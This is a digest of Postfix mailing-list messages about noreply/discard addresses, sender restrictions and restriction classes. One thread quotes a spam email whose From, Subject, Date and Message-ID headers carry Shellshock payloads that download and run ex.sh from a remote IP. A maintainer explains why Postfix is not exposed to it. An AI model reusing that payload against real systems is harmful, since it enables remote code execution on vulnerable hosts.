Re: Adding a noreply address

[Wietse Venema]

Viktor Dukhovni:
> On Wed, Jan 27, 2016 at 04:03:08PM -0500, Wietse Venema wrote:
> 
> > @lbutlr:
> > > On 27 Jan 2016, at 05:46, Mick  wrote:
> > > >  'nore...@domain.com' needs to exist as a mailbox in order for you to 
> > > > discard mail to it as far as I can tell. 
> > > 
> > > Obviously not, since Wietse posted:
> > > 
> > > transport_maps = inline:{u...@example.com=discard:}
> > 
> > Unfortunately, transport_maps does not decide what addresses are valid;
> > that decision is based on virtual_alias_maps, local_recipient_maps,
> > relay_recipient_maps, and virtual_mailbox_maps.
> 
> Isn't there a special case if the target transport is "error".
> 
> transport_maps = inline:{{u...@example.com = error:5.1.1 Mailbox 
> unavailable}}

I should have written: the discard transport does not decide 
what addresses are valid. The error transport makes a different
decision, namely, that an address is invalid.

Wietse

Re: How to block sending outgoing mail from other domains in from field

[Amit Bondwal]

Thank you very Jones, it solved the issue after mapping system users to
email address.

On Wed, Jan 27, 2016 at 8:10 PM, Noel Jones  wrote:

> On 1/27/2016 1:21 AM, Amit Bondwal wrote:
> > Hi Everyone,
> >
> > In my postfix mail server, users are able to send mail on name of
> > different domains
> > using from field in mail client software.
> >
> > For eg. I am using sendEmail mail client, and I can send emails with
> > hdfc.com  domain or other too,
> >
> > sendEmail -v -f "a...@hdfc.com " -s
> > "test.example.in:25 " -xu "amit" -xp
> > "ami*321" -t "x...@yahoo.co.in "  -u "test
> > from sendEmaili 0255" -m "this is sendEmail test"
> >
> > This mail goes to spam and it did not show actual mail address in
> > details header.
> >
> > How Can I restrict my outgoing mails such that it can only send
> > outgoing mails which have my domain  test.example.in
> > ? or it would be great if I can map user's
> > too that user can't use other users name.
> >
> > If only first case work that will be sufficient for me.
> >
> > I searched a lot but not able to do this. my postfix version is
> > 2.11.3-1 on debian Jessie. My setup have just postfix with sasl
> > authentication, authentication is working fine.
> >
> >
> > --
> > Thanks
> >
> > Amit Bondwal
> >
> >
> >
> >
>
>
> You can map sasl login names to allowed MAIL FROM names using
> reject_sender_login_mismatch (or the
> reject_authenticated_sender_login_mismatch,
> reject_unauthenticated_sender_login_mismatch variants).
> http://www.postfix.org/postconf.5.html#reject_sender_login_mismatch
>
>
>
>   -- Noel Jones
>

is postfix vulnerable to this kind of attack?

[Louis Kowolowski]

I found an interesting email that got caught in my spam quarantine. I’m 
wondering if postfix is vulnerable to this kind of code execution (I’m aware 
that other components could be vulnerable, but this question is specifically 
targeting postfix).

The idea is to insert shell commands into various header fields that would get 
executed as part of the message processing/delivery.

Examples include:

From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download 
http: //62.75.175.145/ex...@nes.txt.com;,
w...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;,
fe...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;, s...@nes.txt.com,
ex...@nes.txt.com;, r...@nes.txt.com, -f...@nes.txt.com,
ex.*'@nes.txt.com, &@nes.txt.com;

Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download 
http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 
62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;

The full message, should it be of interest, can be found here:

https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt 


Thank you!

--
Louis Kowolowskilou...@cryptomonkeys.org 

Cryptomonkeys:   http://www.cryptomonkeys.com/ 


Making life more interesting for people since 1977



signature.asc
Description: Message signed with OpenPGP using GPGMail

Re: is postfix vulnerable to this kind of attack?

[Viktor Dukhovni]

On Wed, Jan 27, 2016 at 10:54:50AM -0800, Louis Kowolowski wrote:

> I found an interesting email that got caught in my spam quarantine. I�m
> wondering if postfix is vulnerable to this kind of code execution (I�m
> aware that other components could be vulnerable, but this question is
> specifically targeting postfix).

Postfix does not inject message headers into the environment and
is not itself vulnerable to the shellshock Bash attack nor does
Postfix directly expose delivery programs to the attack.

The local(8) delivery agent does export some envelope data into
the environment of delivery scripts, but these are sanitised:

   A  limited  amount of message context is exported via environment vari‐
   ables. Characters that may  have  special  meaning  to  the  shell  are
   replaced  by  underscores.  The list of acceptable characters is speci‐
   fied with the command_expansion_filter configuration parameter.

See local(8) for details.

Users who write pipe(8) processing programs can of course eval the
message as a shell script if they are so determined, we can't stop
them from doing that.

-- 
Viktor.

Re: is postfix vulnerable to this kind of attack?

[Louis Kowolowski]

On Jan 27, 2016, at 11:24 AM, Viktor Dukhovni  
wrote:
> 
> On Wed, Jan 27, 2016 at 10:54:50AM -0800, Louis Kowolowski wrote:
> 
>> I found an interesting email that got caught in my spam quarantine. I�m
>> wondering if postfix is vulnerable to this kind of code execution (I�m
>> aware that other components could be vulnerable, but this question is
>> specifically targeting postfix).
> 
> Postfix does not inject message headers into the environment and
> is not itself vulnerable to the shellshock Bash attack nor does
> Postfix directly expose delivery programs to the attack.
> 
> The local(8) delivery agent does export some envelope data into
> the environment of delivery scripts, but these are sanitised:
> 
>   A  limited  amount of message context is exported via environment vari‐
>   ables. Characters that may  have  special  meaning  to  the  shell  are
>   replaced  by  underscores.  The list of acceptable characters is speci‐
>   fied with the command_expansion_filter configuration parameter.
> 
> See local(8) for details.
> 
> Users who write pipe(8) processing programs can of course eval the
> message as a shell script if they are so determined, we can't stop
> them from doing that.
> 
Perfect. That’s what I was hoping for.

Thanks Viktor!

--
Louis Kowolowskilou...@cryptomonkeys.org 

Cryptomonkeys:   http://www.cryptomonkeys.com/ 


Making life more interesting for people since 1977



signature.asc
Description: Message signed with OpenPGP using GPGMail

Re: Adding a noreply address

[@lbutlr]

On 27 Jan 2016, at 05:46, Mick  wrote:
>  'nore...@domain.com' needs to exist as a mailbox in order for you to discard 
> mail to it as far as I can tell. 

Obviously not, since Wietse posted:

transport_maps = inline:{u...@example.com=discard:}



-- 
The Nixon I remembered was absolutely humorless; I couldn't imagine
him laughing at anything except maybe a paraplegic who wanted to vote
Democratic but couldn't quite reach the lever on the voting machine.
— Hunter S Thompson

Re: Adding a noreply address

[Wietse Venema]

@lbutlr:
> On 27 Jan 2016, at 05:46, Mick  wrote:
> >  'nore...@domain.com' needs to exist as a mailbox in order for you to 
> > discard mail to it as far as I can tell. 
> 
> Obviously not, since Wietse posted:
> 
> transport_maps = inline:{u...@example.com=discard:}

Unfortunately, transport_maps does not decide what addresses are valid;
that decision is based on virtual_alias_maps, local_recipient_maps,
relay_recipient_maps, and virtual_mailbox_maps.

Wietse

Re: Adding a noreply address

[Mick]

Indeed.

On 27/01/2016 20:45, @lbutlr wrote:

On 27 Jan 2016, at 05:46, Mick  wrote:

  'nore...@domain.com' needs to exist as a mailbox in order for you to discard 
mail to it as far as I can tell.

Obviously not, since Wietse posted:

transport_maps = inline:{u...@example.com=discard:}

Re: Adding a noreply address

[Mick]

Prior to Wietse's earlier post on this thread, I didn't know you could 
alias a non existent address back on itself  in order to make the 
address known to Postfix.  That's simply clever!  I did know you can't 
silently discard messages using Transport if the address didn't exist, 
nor by aliasing such an address to an existing mailbox if the 
destination accepts mail.  I don't reject  'noreply' addresses myself, 
but would opt for Wietse's method should I ever feel the need to do 
so.   Both methods work though.


Mick.

On 27/01/2016 21:03, Wietse Venema wrote:

@lbutlr:

On 27 Jan 2016, at 05:46, Mick  wrote:

  'nore...@domain.com' needs to exist as a mailbox in order for you to discard 
mail to it as far as I can tell.

Obviously not, since Wietse posted:

transport_maps = inline:{u...@example.com=discard:}

Unfortunately, transport_maps does not decide what addresses are valid;
that decision is based on virtual_alias_maps, local_recipient_maps,
relay_recipient_maps, and virtual_mailbox_maps.

Wietse

Re: Adding a noreply address

[Viktor Dukhovni]

On Wed, Jan 27, 2016 at 04:03:08PM -0500, Wietse Venema wrote:

> @lbutlr:
> > On 27 Jan 2016, at 05:46, Mick  wrote:
> > >  'nore...@domain.com' needs to exist as a mailbox in order for you to 
> > > discard mail to it as far as I can tell. 
> > 
> > Obviously not, since Wietse posted:
> > 
> > transport_maps = inline:{u...@example.com=discard:}
> 
> Unfortunately, transport_maps does not decide what addresses are valid;
> that decision is based on virtual_alias_maps, local_recipient_maps,
> relay_recipient_maps, and virtual_mailbox_maps.

Isn't there a special case if the target transport is "error".

transport_maps = inline:{{u...@example.com = error:5.1.1 Mailbox 
unavailable}}

-- 
Viktor.

Fwd: Adding a noreply address

[Matt Bayliss]

Firstly, thanks for all the replies.  Forget I said best practices, I agree
it's a rubbish term - what I really meant was the best way to achieve what
I want.

I suppose I really have two requirements.  1) Monitoring devices that use
this Postfix installation as a relay should be able to set the FROM address
to an address that no one will ever read replies to, but that the mail
server is "happy" with.  In the event that the address finds its way onto
some UCE list I never want an (unmanaged) mailbox to fill, hence the desire
for email it does receive, sent to /dev/null.

The other, separate requirement is 2) To be able to place an valid address
in the To: field for BCC: group emails so that customers see "All Clients"
or something instead of just the From address.  Again, no-one will need to
read email sent to this address as any replies will be sent to the valid
from/reply-to address.


Since I am running 2.3.3 I tried Wietse's suggestion:


I placed the following line in /etc/postfix/main.cf:

transport_maps = hash:/etc/postfix/transport

And added...

nore...@domain.comdiscard

...to /etc/postfix/transport

Then I did:

postmap hash:/etc/postfix/transport

...and...

postfix reload


However when I send mail to nore...@domain.com from an external source
(Gmail) I get a bounceback and "Recipient address rejected: User unknown in
local recipient table;" in the log.


Similarly when I try to use it in a To: address field I get the same
response.


Thanks,


smime.p7s
Description: S/MIME cryptographic signature

Re: Adding a noreply address

[Darac Marjal]

On Tue, Jan 26, 2016 at 03:54:51PM +, Matt Bayliss wrote:

 

I'm trying to find the correct/best practice method for setting up a black hole
email address for such items as "noreply" addresses when sending alerts from
monitoring devices etc. 


RFC 6854 adds the ability to use "Group Addresses" in the sender fields.  
That is, similar to how you can have "undisclosed recipients", you can 
have "undisclosed sender". So:


From: Promotional Mail Bot:;
To: Bob 
Subject: Buy More Widgets!
Date: 12th of Never

Hi Bob,

Don't forget to buy more widgets from us!

WidgetCo

The list of people in the group is optional, so you could also do:

From: Doctors Surgery:drn...@example.org,drhibb...@example.org;
...

Mind you, I've never actually seen RFC6854-syntax in the wild.



I have come across a couple of tutorials which has instructions such as:



" edit the /etc/postfix/aliases file and add there as bottom line:

devnull: /dev/null

- rebuild the aliases.db file with the command:

newaliases

- edit the /etc/postfix/virtual file and add as bottom line (replace the [1]
example.com domain with your main virtual domain):

[2]blackh...@example.com devnull

- rebuild virtual.db file with the command:

postmap /etc/postfix/virtual

 

Now create a mail user or alias that is forwarded to [3]blackh...@example.com ... 
that's all!"



So I don't really want to create a user on the system unless its really
necessary so how would I alias it, is that not already done when editing /etc/
postfix/aliases.p, all I really want is a specific address in the mail domain
to silently accept and drop any mail sent to it.

Error in log isRecipient address rejected: User unknown in local recipient table; 
from=<> to=[4]nore...@domain.com

Thanks,

 


References:

[1] http://example.com/
[2] mailto:blackh...@example.com
[3] mailto:blackh...@example.com
[4] mailto:nore...@domain.com


--
For more information, please reread.


signature.asc
Description: PGP signature

SV: Adding a noreply address

[Sebastian Nielsen]

I would suggest against this, since there is a risk that servers aren't 
supporting this, and might deny the mail, discard it (send it to /dev/null, 
which I do with obvious spam), quarantine it or sort it to the end user's spam 
folder.

Its better to set up a nore...@yourdomain.tld adress set to DISCARD. Doing this 
will also "circumvent" sender adress verification, which some (un-serious) mail 
systems do.

-Ursprungligt meddelande-
Från: owner-postfix-us...@postfix.org [mailto:owner-postfix-us...@postfix.org] 
För Darac Marjal
Skickat: den 27 januari 2016 11:26
Till: postfix-users@postfix.org
Ämne: Re: Adding a noreply address [Invalid]

On Tue, Jan 26, 2016 at 03:54:51PM +, Matt Bayliss wrote:
> 
>
>I'm trying to find the correct/best practice method for setting up a 
>black hole email address for such items as "noreply" addresses when 
>sending alerts from monitoring devices etc.

RFC 6854 adds the ability to use "Group Addresses" in the sender fields.  
That is, similar to how you can have "undisclosed recipients", you can have 
"undisclosed sender". So:

From: Promotional Mail Bot:;
To: Bob 
Subject: Buy More Widgets!
Date: 12th of Never

Hi Bob,

Don't forget to buy more widgets from us!

WidgetCo

The list of people in the group is optional, so you could also do:

From: Doctors Surgery:drn...@example.org,drhibb...@example.org;
...

Mind you, I've never actually seen RFC6854-syntax in the wild.

>
>I have come across a couple of tutorials which has instructions such as:
>
>
>
>" edit the /etc/postfix/aliases file and add there as bottom line:
>
>devnull: /dev/null
>
>- rebuild the aliases.db file with the command:
>
>newaliases
>
>- edit the /etc/postfix/virtual file and add as bottom line (replace 
>the [1] example.com domain with your main virtual domain):
>
>[2]blackh...@example.com devnull
>
>- rebuild virtual.db file with the command:
>
>postmap /etc/postfix/virtual
>
> 
>
>Now create a mail user or alias that is forwarded to [3]blackh...@example.com 
>... that's all!"
>
>
>
>So I don't really want to create a user on the system unless its really 
>necessary so how would I alias it, is that not already done when 
>editing /etc/ postfix/aliases.p, all I really want is a specific 
>address in the mail domain to silently accept and drop any mail sent to it.
>
>Error in log isRecipient address rejected: User unknown in local 
>recipient table; from=<> to=[4]nore...@domain.com
>
>Thanks,
>
> 
>
>
>References:
>
>[1] http://example.com/
>[2] mailto:blackh...@example.com
>[3] mailto:blackh...@example.com
>[4] mailto:nore...@domain.com

--
For more information, please reread.



smime.p7s
Description: S/MIME Cryptographic Signature

Re: Returning from custom restriction class and proceed with the remaning checks

[Noel Jones]

On 1/27/2016 8:18 AM, Igor Sverkos wrote:
> Hi,
> 
> OK, when I jump from smtpd_client_restrictions via check_*_access into
> a custom restriction class a "DUNNO" to end (skip) the custom
> restriction class will send me back to smtpd_client_restrictions.
> 
> Can I get postfix's dnswl_client check to return with DUNNO when I
> want this check to decide if I want to end (skip) a custom restriction
> class?
> 
> Thanks!
> 
> 


No.  Put the continued restrictions in smtpd_helo_restrictions.


  -- Noel Jones

Re: How to block sending outgoing mail from other domains in from field

[Noel Jones]

On 1/27/2016 1:21 AM, Amit Bondwal wrote:
> Hi Everyone,
> 
> In my postfix mail server, users are able to send mail on name of
> different domains
> using from field in mail client software.
> 
> For eg. I am using sendEmail mail client, and I can send emails with
> hdfc.com  domain or other too,
> 
> sendEmail -v -f "a...@hdfc.com " -s
> "test.example.in:25 " -xu "amit" -xp
> "ami*321" -t "x...@yahoo.co.in "  -u "test
> from sendEmaili 0255" -m "this is sendEmail test"
> 
> This mail goes to spam and it did not show actual mail address in
> details header.
> 
> How Can I restrict my outgoing mails such that it can only send
> outgoing mails which have my domain  test.example.in
> ? or it would be great if I can map user's
> too that user can't use other users name.
> 
> If only first case work that will be sufficient for me.
> 
> I searched a lot but not able to do this. my postfix version is
> 2.11.3-1 on debian Jessie. My setup have just postfix with sasl
> authentication, authentication is working fine.
> 
> 
> --
> Thanks
> 
> Amit Bondwal
> 
> 
>  
> 


You can map sasl login names to allowed MAIL FROM names using
reject_sender_login_mismatch (or the
reject_authenticated_sender_login_mismatch,
reject_unauthenticated_sender_login_mismatch variants).
http://www.postfix.org/postconf.5.html#reject_sender_login_mismatch



  -- Noel Jones

Re: Fwd: Adding a noreply address

[Wietse Venema]

Matt Bayliss:
> Firstly, thanks for all the replies.  Forget I said best practices, I agree
> it's a rubbish term - what I really meant was the best way to achieve what
> I want.
> 
> I suppose I really have two requirements.  1) Monitoring devices that use
> this Postfix installation as a relay should be able to set the FROM address
> to an address that no one will ever read replies to, but that the mail
> server is "happy" with.  In the event that the address finds its way onto
> some UCE list I never want an (unmanaged) mailbox to fill, hence the desire
> for email it does receive, sent to /dev/null.
> 
> The other, separate requirement is 2) To be able to place an valid address
> in the To: field for BCC: group emails so that customers see "All Clients"
> or something instead of just the From address.  Again, no-one will need to
> read email sent to this address as any replies will be sent to the valid
> from/reply-to address.
> 
> 
> Since I am running 2.3.3 I tried Wietse's suggestion:
> 
> 
> I placed the following line in /etc/postfix/main.cf:
> 
> transport_maps = hash:/etc/postfix/transport
> 
> And added...
> 
> nore...@domain.comdiscard
> 
> ...to /etc/postfix/transport
> 
> Then I did:
> 
> postmap hash:/etc/postfix/transport
> 
> ...and...
> 
> postfix reload
> 
> 
> However when I send mail to nore...@domain.com from an external source
> (Gmail) I get a bounceback and "Recipient address rejected: User unknown in
> local recipient table;" in the log.

In that case, create a virtual alias nore...@domain.com->nore...@domain.com
(so that the address is "known"), or use an access map with a discard"
action as suggested in this thread (so that it never reaches the
code path that tests the "user unknown" condition).

Wietse

Re: Returning from custom restriction class and proceed with the remaning checks

[Igor Sverkos]

Hi,

OK, when I jump from smtpd_client_restrictions via check_*_access into
a custom restriction class a "DUNNO" to end (skip) the custom
restriction class will send me back to smtpd_client_restrictions.

Can I get postfix's dnswl_client check to return with DUNNO when I
want this check to decide if I want to end (skip) a custom restriction
class?

Thanks!


-- 
Regards,
Igor

Re: Fwd: Adding a noreply address

[Mick]

On 27/01/2016 12:00, Matt Bayliss wrote:


However when I send mail to nore...@domain.com 
 from an external source (Gmail) I get a 
bounceback and "Recipient address rejected: User unknown in local 
recipient table;" in the log.



Similarly when I try to use it in a To: address field I get the same 
response.


 'nore...@domain.com' needs to exist as a mailbox in order for you to 
discard mail to it as far as I can tell.


Mick




Thanks,